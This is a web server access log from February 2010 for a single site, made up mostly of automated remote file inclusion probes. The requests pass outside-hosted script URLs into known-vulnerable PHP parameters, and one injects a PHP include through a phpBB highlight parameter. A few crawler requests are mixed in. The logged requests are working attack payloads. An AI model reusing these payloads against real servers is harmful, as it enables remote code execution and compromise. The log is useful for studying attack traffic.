118.217.216.132 - - [11/Feb/2010:04:54:25 -0800] "GET /logs/access_100127.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:26 -0800] "GET /logs/access_100127.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:29 -0800] "GET /logs/access_100111.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:54:31 -0800] "GET /logs/access_100111.log%20%20/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:54:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:54:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:54:56 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
8.7.26.27 - - [11/Feb/2010:04:55:02 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.248 - - [11/Feb/2010:04:55:07 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:55:18 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:55:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:55:57 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:55:58 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:55:58 -0800] "GET /logs/access_100105.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:56:01 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:56:01 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:56:05 -0800] "GET /logs/access_100105.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:25 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:35 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:56:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:56:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:56:44 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:56:45 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:57:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:57:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:57:57 -0800] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:58:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:58:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:58:04 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:58:19 -0800] "GET /logs/access_100114.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:58:19 -0800] "GET /logs/access_100115.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:58:21 -0800] "GET /logs/access_100115.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [11/Feb/2010:04:58:21 -0800] "GET /logs/access_100114.log/index.php//bookmark4u/lostpasswd.php?env[include_prefix]=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:04:58:45 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:58:49 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:59:14 -0800] "GET /logs/access_100208.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:59:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:59:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:59:18 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:59:44 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:59:44 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:59:44 -0800] "GET /logs/access_100112.log//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:59:44 -0800] "GET /logs/access_100126.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:04:59:48 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:00:00 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:00:01 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:00:39 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:01:04 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:01:04 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:01:04 -0800] "GET /logs/access_100112.log//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:03:01 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:03:01 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:03:01 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:05:03:20 -0800] "GET /logs/access_100127.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:03:36 -0800] "GET /logs//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:03:39 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:03:39 -0800] "GET /components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:04:10 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:04:10 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:04:10 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:21 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:21 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:04:24 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:27 -0800] "GET /logs/access_100104.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:31 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:31 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:32 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:33 -0800] "GET /logs/access_100104.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:33 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:34 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:34 -0800] "GET /logs/access_100104.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:37 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:04:42 -0800] "GET /logs/access_100104.log//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:05:15 -0800] "GET /logs//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:05:15 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:05:15 -0800] "GET /components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:05:25 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:05:25 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:05:25 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:05:30 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:41 -0800] "GET /pictures/p7 HTTP/1.0" 301 80 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:43 -0800] "GET /pictures/p7/ HTTP/1.0" 302 7200 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:44 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:44 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:44 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:45 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [11/Feb/2010:05:05:45 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://www.puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
211.115.213.195 - - [11/Feb/2010:05:05:46 -0800] "GET /logs/access_100127.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:05:05:49 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:05:05:50 -0800] "GET /orange_g/forum/viewtopic.php?p=28058 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
212.193.10.130 - - [11/Feb/2010:05:06:02 -0800] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:06:02 -0800] "GET /logs/access_100202.log/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:06:02 -0800] "GET /components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:06:02 -0800] "GET /logs/access_100103.log%20%20//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:06:02 -0800] "GET /logs//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:06:03 -0800] "GET /logs/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
77.79.245.1 - - [11/Feb/2010:05:06:09 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.193.10.130 - - [11/Feb/2010:05:06:17 -0800] "GET /logs/access_100109.log/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://bluehousejodhpur.com/modlogan/m_usage.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:08:23 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:08:23 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:08:23 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:05:08:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:08:38 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:08:38 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:08:38 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:08:43 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:09:19 -0800] "GET /logs/access_100122.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:09:37 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:09:37 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:05:09:37 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:11:11 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:11:11 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:05:11:16 -0800] "GET /logs/access_100112.log%20%20//include/bbs.lib.inc.php?site_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:11:19 -0800] "GET /logs/access_100203.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:11:19 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:05:11:19 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
